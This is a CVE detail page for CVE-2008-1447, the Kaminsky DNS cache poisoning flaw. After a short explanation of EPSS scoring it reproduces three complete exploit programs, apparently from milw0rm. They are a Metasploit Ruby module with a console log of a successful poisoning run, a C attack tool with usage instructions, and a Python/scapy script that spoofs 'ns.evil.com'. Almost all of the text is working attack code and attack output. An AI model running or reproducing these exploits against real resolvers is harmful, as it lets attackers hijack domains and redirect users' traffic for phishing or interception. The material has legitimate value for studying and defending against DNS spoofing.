CVE-2008-1447 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground http://www.caughq.org Exploit Code ===============/======================================================== Exploit ID: CAU-EX-2008-0003 Release Date: 2008.07.23 Title: bailiwicked_domain.rb Description: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains Tested: BIND 9.4.1-9.4.2 Attributes: Remote, Poison, Resolver, Metasploit Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt Author/Email: I)ruid <druid (@) caughq.org> H D Moore <hdm (@) metasploit.com> ===============/======================================================== Description =========== This exploit targets a fairly ubiquitous flaw in DNS implementations which allow the insertion of malicious DNS records into the cache of the target nameserver. This exploit caches a single malicious nameserver entry into the target nameserver which replaces the legitimate nameservers for the target domain. By causing the target nameserver to query for random hostnames at the target domain, the attacker can spoof a response to the target server including an answer for the query, an authority server record, and an additional record for that server, causing target nameserver to insert the additional record into the cache. This insertion completely replaces the original nameserver records for the target domain. Example ======= # /msf3/msfconsole ## ### ## ## ## ## #### ###### #### ##### ##### ## #### ###### ####### ## ## ## ## ## ## ## ## ## ## ### ## ####### ###### ## ##### #### ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ##### ## ## ## ## ## ## ## #### ### ##### ##### ## #### #### #### ### ## =[ msf v3.2-release + -- --=[ 298 exploits - 124 payloads + -- --=[ 18 encoders - 6 nops =[ 73 aux msf > use auxiliary/spoof/dns/bailiwicked_domain msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D RHOST => A.B.C.D msf auxiliary(bailiwicked_domain) > set DOMAIN example.com DOMAIN => example.com msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com NEWDNS => dns01.metasploit.com msf auxiliary(bailiwicked_domain) > set SRCPORT 0 SRCPORT => 0 msf auxiliary(bailiwicked_domain) > check [*] Using the Metasploit service to verify exploitability... [*] >> ADDRESS: A.B.C.D PORT: 50391 [*] >> ADDRESS: A.B.C.D PORT: 50391 [*] >> ADDRESS: A.B.C.D PORT: 50391 [*] >> ADDRESS: A.B.C.D PORT: 50391 [*] >> ADDRESS: A.B.C.D PORT: 50391 [*] FAIL: This server uses static source ports and is vulnerable to poisoning msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D [*] exec: dig +short -t ns example.com @A.B.C.D b.iana-servers.net. a.iana-servers.net. msf auxiliary(bailiwicked_domain) > run [*] Switching to target port 50391 based on Metasploit service [*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com [*] Querying recon nameserver for example.com.'s nameservers... [*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net. [*] Querying recon nameserver for address of b.iana-servers.net.... [*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236 [*] Checking Authoritativeness: Querying 193.0.0.236 for example.com.... [*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as [*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net. [*] Querying recon nameserver for address of a.iana-servers.net.... [*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43 [*] Checking Authoritativeness: Querying 192.0.34.43 for example.com.... [*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as [*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391... [*] Sent 1000 queries and 20000 spoofed responses... [*] Sent 2000 queries and 40000 spoofed responses... [*] Sent 3000 queries and 60000 spoofed responses... [*] Sent 4000 queries and 80000 spoofed responses... [*] Sent 5000 queries and 100000 spoofed responses... [*] Sent 6000 queries and 120000 spoofed responses... [*] Sent 7000 queries and 140000 spoofed responses... [*] Sent 8000 queries and 160000 spoofed responses... [*] Sent 9000 queries and 180000 spoofed responses... [*] Sent 10000 queries and 200000 spoofed responses... [*] Sent 11000 queries and 220000 spoofed responses... [*] Sent 12000 queries and 240000 spoofed responses... [*] Sent 13000 queries and 260000 spoofed responses... [*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com [*] Auxiliary module execution completed msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D [*] exec: dig +short -t ns example.com @A.B.C.D dns01.metasploit.com. Credits ======= Dan Kaminsky is credited with originally discovering this vulnerability. Cedric Blancher <sid (@) rstack.org> figured out the NS injection method and was cool enough to email us and share! References ========== http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 http://www.kb.cert.org/vuls/id/800113 Metasploit ========== require 'msf/core' require 'net/dns' require 'scruby' require 'resolv' module Msf class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary include Exploit::Remote::Ip def initialize(info = {}) super(update_info(info, 'Name' => 'DNS BailiWicked Domain Attack', 'Description' => %q{ This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target domains nameserver entries in a vulnerable DNS cache server. This attack works by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. Eventually, a guessed ID will match, the spoofed packet will get accepted, and the nameserver entries for the target domain will be replaced by the server specified in the NEWDNS option of this exploit. }, 'Author' => [ ' I)ruid', 'hdm', # 'Cedric Blancher <sid[at]rstack.org>' # Cedric figured out the NS injection method # and was cool enough to email us and share! # ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 5591 $', 'References' => [ [ 'CVE', '2008-1447' ], [ 'US-CERT-VU', '8000113' ], [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ], ], 'DisclosureDate' => 'Jul 21 2008' )) register_options( [ OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]), OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), OptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]), ], self.class) end def auxiliary_commands return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" } end def cmd_check(*args) targ = args[0] || rhost() if(not (targ and targ.length > 0)) print_status("usage: check [dns-server]") return end print_status("Using the Metasploit service to verify exploitability...") srv_sock = Rex::Socket.create_udp( 'PeerHost' => targ, 'PeerPort' => 53 ) random = false ports = [] lport = nil 1.upto(5) do |i| req = Resolv::DNS::Message.new txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" req.add_question(txt, Resolv::DNS::Resource::IN::TXT) req.rd = 1 srv_sock.put(req.encode) res, addr = srv_sock.recvfrom() if res and res.length > 0 res = Resolv::DNS::Message.decode(res) res.each_answer do |name, ttl, data| if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m) t_addr, t_port = $1.split(':') print_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}") t_port = t_port.to_i if(lport and lport != t_port) random = true end lport = t_port ports << t_port end end end end srv_sock.close if(ports.length < 5) print_status("UNKNOWN: This server did not reply to our vulnerability check requests") return end if(random) print_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}") print_status(" This server may still be exploitable, but not by this tool.") else print_status("FAIL: This server uses static source ports and is vulnerable to poisoning") end end def run target = rhost() source = Rex::Socket.source_address(target) sport = datastore['SRCPORT'] domain = datastore['DOMAIN'] + '.' newdns = datastore['NEWDNS'] recons = datastore['RECONS'] xids = datastore['XIDS'].to_i newttl = datastore['TTL'].to_i xidbase = rand(20001) + 20000 address = Rex::Text.rand_text(4).unpack("C4").join(".") srv_sock = Rex::Socket.create_udp( 'PeerHost' => target, 'PeerPort' => 53 ) # Get the source port via the metasploit service if it's not set if sport.to_i == 0 req = Resolv::DNS::Message.new txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" req.add_question(txt, Resolv::DNS::Resource::IN::TXT) req.rd = 1 srv_sock.put(req.encode) res, addr = srv_sock.recvfrom() if res and res.length > 0 res = Resolv::DNS::Message.decode(res) res.each_answer do |name, ttl, data| if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m) t_addr, t_port = $1.split(':') sport = t_port.to_i print_status("Switching to target port #{sport} based on Metasploit service") if target != t_addr print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!") end end end end end # Verify its not already poisoned begin query = Resolv::DNS::Message.new query.add_question(domain, Resolv::DNS::Resource::IN::NS) query.rd = 0 begin cached = false srv_sock.put(query.encode) answer, addr = srv_sock.recvfrom() if answer and answer.length > 0 answer = Resolv::DNS::Message.decode(answer) answer.each_answer do |name, ttl, data| if((name.to_s + ".") == domain and data.name.to_s == newdns) t = Time.now + ttl print_status("Failure: This domain is already using #{newdns} as a nameserver") print_status(" Cache entry expires on #{t.to_s}") srv_sock.close disconnect_ip return end end end end until not cached rescue ::Interrupt raise $! rescue ::Exception => e print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}") end res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver print_status "Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}" # Look up the nameservers for the domain print_status "Querying recon nameserver for #{domain}'s nameservers..." answer0 = res0.send(domain, Net::DNS::NS) #print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities" barbs = [] # storage for nameservers answer0.answer.each do |rr0| print_status " Got an #{rr0.type} record: #{rr0.inspect}" if rr0.type == 'NS' print_status " Querying recon nameserver for address of #{rr0.nsdname}..." answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname #print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities" answer1.answer.each do |rr1| print_status " Got an #{rr1.type} record: #{rr1.inspect}" res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) print_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..." answer2 = res2.send(domain) if answer2 and answer2.header.auth? and answer2.header.anCount >= 1 nsrec = {:name => rr0.nsdname, :addr => rr1.address} barbs << nsrec print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as" end end end end if barbs.length == 0 print_status( "No DNS servers found.") srv_sock.close disconnect_ip return end # Flood the target with queries and spoofed responses, one will eventually hit queries = 0 responses = 0 connect_ip if not ip_sock print_status( "Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...") while true randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname # Send spoofed query req = Resolv::DNS::Message.new req.id = rand(2**16) req.add_question(randhost, Resolv::DNS::Resource::IN::A) req.rd = 1 buff = ( Scruby::IP.new( #:src => barbs[0][:addr].to_s, :src => source, :dst => target, :proto => 17 )/Scruby::UDP.new( :sport => (rand((2**16)-1024)+1024).to_i, :dport => 53 )/req.encode ).to_net ip_sock.sendto(buff, target) queries += 1 # Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns))) req.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored req.qr = 1 req.aa = 1 xidbase.upto(xidbase+xids-1) do |id| req.id = id barbs.each do |barb| buff = ( Scruby::IP.new( #:src => barbs[i][:addr].to_s, :src => barb[:addr].to_s, :dst => target, :proto => 17 )/Scruby::UDP.new( :sport => 53, :dport => sport.to_i )/req.encode ).to_net ip_sock.sendto(buff, target) responses += 1 end end # status update if queries % 1000 == 0 print_status("Sent #{queries} queries and #{responses} spoofed responses...") end # every so often, check and see if the target is poisoned... if queries % 250 == 0 begin query = Resolv::DNS::Message.new query.add_question(domain, Resolv::DNS::Resource::IN::NS) query.rd = 0 srv_sock.put(query.encode) answer, addr = srv_sock.recvfrom() if answer and answer.length > 0 answer = Resolv::DNS::Message.decode(answer) answer.each_answer do |name, ttl, data| if((name.to_s + ".") == domain and data.name.to_s == newdns) print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}") srv_sock.close disconnect_ip return end end end rescue ::Interrupt raise $! rescue ::Exception => e print_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}") end end end end end end # milw0rm.com [2008-07-23]

/* * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack * * Compilation: * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm * * Dependency: libdnet (aka libdumbnet-dev under Ubuntu) * * Author: marc.bevand at rapid7 dot com */ #define _BSD_SOURCE #include <sys/types.h> #include <err.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <math.h> #include <time.h> #include <unistd.h> #include <dumbnet.h> #define DNSF_RESPONSE (1<<15) #define DNSF_AUTHORITATIVE (1<<10) #define DNSF_REC_DESIRED (1<<8) #define DNSF_REC_AVAILABLE (1<<7) #define TYPE_A 0x1 #define TYPE_NS 0x2 #define CLASS_IN 0x1 struct dns_pkt { uint16_t txid; uint16_t flags; uint16_t nr_quest; uint16_t nr_ans; uint16_t nr_auth; uint16_t nr_add; } __attribute__ ((__packed__)); void format_domain(u_char *buf, unsigned size, unsigned *len, const char *name) { unsigned bufi, i, j; bufi = i = j = 0; while (name[i]) { if (name[i] == '.') { if (bufi + 1 + (i - j) > size) fprintf(stderr, "format_domain overflow\n"), exit(1); buf[bufi++] = i - j; memcpy(buf + bufi, name + j, i - j); bufi += i - j; j = i + 1; } i++; } if (bufi + 1 + 2 + 2 > size) fprintf(stderr, "format_domain overflow\n"), exit(1); buf[bufi++] = 0; *len = bufi; } void format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class) { uint16_t tmp; // name format_domain(buf, size, len, name); // type tmp = htons(type); memcpy(buf + *len, &tmp, sizeof (tmp)); *len += sizeof (tmp); // class tmp = htons(class); memcpy(buf + *len, &tmp, sizeof (tmp)); *len += sizeof (tmp); } void format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data) { format_qr(buf, size, len, name, type, class); // ttl ttl = htonl(ttl); memcpy(buf + *len, &ttl, sizeof (ttl)); *len += sizeof (ttl); // data length + data uint16_t dlen; struct addr addr; switch (type) { case TYPE_A: dlen = sizeof (addr.addr_ip); break; case TYPE_NS: dlen = strlen(data) + 1; break; default: fprintf(stderr, "format_rr: unknown type %02x", type); exit(1); } dlen = htons(dlen); memcpy(buf + *len, &dlen, sizeof (dlen)); *len += sizeof (dlen); // data unsigned len2; switch (type) { case TYPE_A: if (addr_aton(data, &addr) < 0) fprintf(stderr, "invalid destination IP: %s", data), exit(1); memcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip)); *len += sizeof (addr.addr_ip); break; case TYPE_NS: format_domain(buf + *len, size - *len, &len2, data); *len += len2; break; default: fprintf(stderr, "format_rr: unknown type %02x", type); exit(1); } } void dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name) { u_char *out = buf; struct dns_pkt p = { .txid = htons(txid), .flags = htons(flags), .nr_quest = htons(1), .nr_ans = htons(0), .nr_auth = htons(0), .nr_add = htons(0), }; u_char qr[256]; unsigned l; format_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN); if (sizeof (p) + l > size) fprintf(stderr, "dns_query overflow"), exit(1); memcpy(out, &p, sizeof (p)); out += sizeof (p); memcpy(out, qr, l); out += l; *len = sizeof (p) + l; } void dns_response(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *q_name, const char *q_ip, const char *domain, const char *auth_name, const char *auth_ip) { u_char *out = buf; u_char *end = buf + size; u_char rec[256]; unsigned l_rec; uint32_t ttl = 24*3600; struct dns_pkt p = { .txid = htons(txid), .flags = htons(flags), .nr_quest = htons(1), .nr_ans = htons(1), .nr_auth = htons(1), .nr_add = htons(1), }; (void)domain; *len = 0; if (out + *len + sizeof (p) > end) fprintf(stderr, "dns_response overflow"), exit(1); memcpy(out + *len, &p, sizeof (p)); *len += sizeof (p); // queries format_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN); if (out + *len + l_rec > end) fprintf(stderr, "dns_response overflow"), exit(1); memcpy(out + *len, rec, l_rec); *len += l_rec; // answers format_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN, ttl, q_ip); if (out + *len + l_rec > end) fprintf(stderr, "dns_response overflow"), exit(1); memcpy(out + *len, rec, l_rec); *len += l_rec; // authoritative nameservers format_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN, ttl, auth_name); if (out + *len + l_rec > end) fprintf(stderr, "dns_response overflow"), exit(1); memcpy(out + *len, rec, l_rec); *len += l_rec; // additional records format_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN, ttl, auth_ip); if (out + *len + l_rec > end) fprintf(stderr, "dns_response overflow"), exit(1); memcpy(out + *len, rec, l_rec); *len += l_rec; } unsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name) { unsigned len = 0; // ip struct ip_hdr *ip = (struct ip_hdr *)buf; ip->ip_hl = 5; ip->ip_v = 4; ip->ip_tos = 0; ip->ip_id = rand() & 0xffff; ip->ip_off = 0; ip->ip_ttl = IP_TTL_MAX; ip->ip_p = 17; // udp ip->ip_sum = 0; struct addr addr; if (addr_aton(srcip, &addr) < 0) fprintf(stderr, "invalid source IP: %s", srcip), exit(1); ip->ip_src = addr.addr_ip; if (addr_aton(dstip, &addr) < 0) fprintf(stderr, "invalid destination IP: %s", dstip), exit(1); ip->ip_dst = addr.addr_ip; // udp struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN); udp->uh_sport = htons(1234); udp->uh_dport = htons(53); // dns dns_query(buf + IP_HDR_LEN + UDP_HDR_LEN, (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len, rand(), DNSF_REC_DESIRED, name); // udp len len += UDP_HDR_LEN; udp->uh_ulen = htons(len); // ip len & cksum len += IP_HDR_LEN; ip->ip_len = htons(len); ip_checksum(buf, len); return len; } unsigned build_response(u_char *buf, const char *srcip, const char *dstip, uint16_t port_resolver, uint16_t txid, const char *q_name, const char *q_ip, const char *domain, const char *auth_name, const char *auth_ip) { unsigned len = 0; // ip struct ip_hdr *ip = (struct ip_hdr *)buf; ip->ip_hl = 5; ip->ip_v = 4; ip->ip_tos = 0; ip->ip_id = rand() & 0xffff; ip->ip_off = 0; ip->ip_ttl = IP_TTL_MAX; ip->ip_p = 17; // udp ip->ip_sum = 0; struct addr addr; if (addr_aton(srcip, &addr) < 0) fprintf(stderr, "invalid source IP: %s", srcip), exit(1); ip->ip_src = addr.addr_ip; if (addr_aton(dstip, &addr) < 0) fprintf(stderr, "invalid destination IP: %s", dstip), exit(1); ip->ip_dst = addr.addr_ip; // udp struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN); udp->uh_sport = htons(53); udp->uh_dport = htons(port_resolver); // dns dns_response(buf + IP_HDR_LEN + UDP_HDR_LEN, (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len, txid, DNSF_RESPONSE | DNSF_AUTHORITATIVE, q_name, q_ip, domain, auth_name, auth_ip); // udp len len += UDP_HDR_LEN; udp->uh_ulen = htons(len); // ip len & cksum len += IP_HDR_LEN; ip->ip_len = htons(len); ip_checksum(buf, len); return len; } void usage(char *name) { fprintf(stderr, "Usage: %s <ip-querier> <ip-resolver> <ip-authoritative> " "<port-resolver> <subhost> <domain> <any-ip> <attempts> <repl-per-attempt>\n" " <ip-querier> Source IP used when sending queries for random hostnames\n" " (typically your IP)\n" " <ip-resolver> Target DNS resolver to attack\n" " <ip-authoritative> One of the authoritative DNS servers for <domain>\n" " <port-resolver> Source port used by the resolver when forwarding queries\n" " <subhost> Poison the cache with the A record <subhost>.<domain>\n" " <domain> Domain name, see <subhost>.\n" " <any-ip> IP of your choice to be associated to <subhost>.<domain>\n" " <attempts> Number of poisoning attemps, more attempts increase the\n" " chance of successful poisoning, but also the attack time\n" " <repl-per-attempt> Number of spoofed replies to send per attempt, more replies\n" " increase the chance of successful poisoning but, but also\n" " the rate of packet loss\n" "Example:\n" " $ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16\n" "This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\n" "in r.r.r.r's cache. The chance of successfully poisoning the resolver with\n" "this example (8192 attempts and 16 replies/attempt) is 86%%\n" "(1-(1-16/65536)**8192). This example also requires a bandwidth of about\n" "2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\n" "8 bits/byte) and takes about 80 secs to complete (8192 attempts /\n" "100 attempts/sec).\n", name, name); } int main(int argc, char **argv) { if (argc != 10) usage(argv[0]), exit(1); const char *querier = argv[1]; const char *ip_resolver = argv[2]; const char *ip_authoritative = argv[3]; uint16_t port_resolver = (uint16_t)strtoul(argv[4], NULL, 0); const char *subhost = argv[5]; const char *domain = argv[6]; const char *anyip = argv[7]; uint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0); uint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0); if (domain[strlen(domain) - 1 ] != '.') fprintf(stderr, "domain must end with dot(.): %s\n", domain), exit(1); printf("Chance of success: 1-(1-%d/65536)**%d = %.2f\n", replies, attempts, 1 - pow((1 - replies / 65536.), attempts)); srand(time(NULL)); int unique = rand() + (rand() << 16); u_char buf[IP_LEN_MAX]; unsigned len; char name[256]; char ns[256]; ip_t *iph; if ((iph = ip_open()) == NULL) err(1, "ip_open"); int cnt = 0; while (cnt < attempts) { // send a query for a random hostname snprintf(name, sizeof (name), "%08x%08x.%s", unique, cnt, domain); len = build_query(buf, querier, ip_resolver, name); if (ip_send(iph, buf, len) != len) err(1, "ip_send"); // give the resolver enough time to forward the query and be in a state // where it waits for answers; sleeping 10ms here limits the number of // attempts to 100 per sec usleep(10000); // send spoofed replies, each reply contains: // - 1 query: query for the "random hostname" // - 1 answer: "random hostname" A 1.1.1.1 // - 1 authoritative nameserver: <domain> NS <subhost>.<domain> // - 1 additional record: <subhost>.<domain> A <any-ip> snprintf(ns, sizeof (ns), "%s.%s", subhost, domain); unsigned r; for (r = 0; r < replies; r++) { // use a txid that is just 'r': 0..(replies-1) len = build_response(buf, ip_authoritative, ip_resolver, port_resolver, r, name, "1.1.1.1", domain, ns, anyip); if (ip_send(iph, buf, len) != len) err(1, "ip_send"); } cnt++; } ip_close(iph); return 0; } // milw0rm.com [2008-07-25]

from scapy import * import random # Copyright (C) 2008 Julien Desfossez <[email protected]> # http://www.solisproject.net/ # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # This script exploit the flaw discovered by Dan Kaminsky # http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 # http://www.kb.cert.org/vuls/id/800113 # It tries to insert a dummy record in the vulnerable DNS server by guessing # the transaction ID. # It also insert Authority record for a valid record of the target domain. # To use this script, you have to discover the source port used by the vulnerable # DNS server. # Python is really slow, so it will take some time, but it works :-) # IP to insert for our dummy record targetip = "X.X.X.X" # Vulnerable recursive DNS server targetdns = "X.X.X.X" # Authoritative NS for the target domain srcdns = ["X.X.X.X"] # Domain to play with dummydomain = "" basedomain = ".example.com." # sub-domain to claim authority on domain = "sub.example.com." # Spoofed authoritative DNS for the sub-domain spoof="ns.evil.com." # src port of vulnerable DNS for recursive queries dnsport = 32883 # base packet rep = IP(dst=targetdns, src=srcdns[0])/ \ UDP(sport=53, dport=dnsport)/ \ DNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), an=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4), ns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2) ) currentid = 1024 dummyid = 3 while 1: dummydomain = "a" + str(dummyid) + basedomain dummyid = dummyid + 1 # request for our dummydomain req = IP(dst=targetdns)/ \ UDP(sport=random.randint(1025, 65000), dport=53)/ \ DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0, qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), an=0, ns=0, ar=0 ) send(req) # build the response rep.getlayer(DNS).qd.qname = dummydomain rep.getlayer(DNS).an.rrname = dummydomain for i in range(50): # TXID rep.getlayer(DNS).id = currentid currentid = currentid + 1 if currentid == 65536: currentid = 1024 # len and chksum rep.getlayer(UDP).len = IP(str(rep)).len-20 rep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload)) print "Sending our reply from %s with TXID = %s for %s" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain) send(rep, verbose=0) # check to see if it worked req = IP(dst=targetdns)/ \ UDP(sport=random.randint(1025, 65000), dport=53)/ \ DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0, qd=DNSQR(qname=dummydomain, qtype=1, qclass=1), an=0, ns=0, ar=0 ) z = sr1(req, timeout=2, retry=0, verbose=0) try: if z[DNS].an.rdata == targetip: print "Successfully poisonned our target with a dummy record !!" break except: print "Poisonning failed" # milw0rm.com [2008-07-24]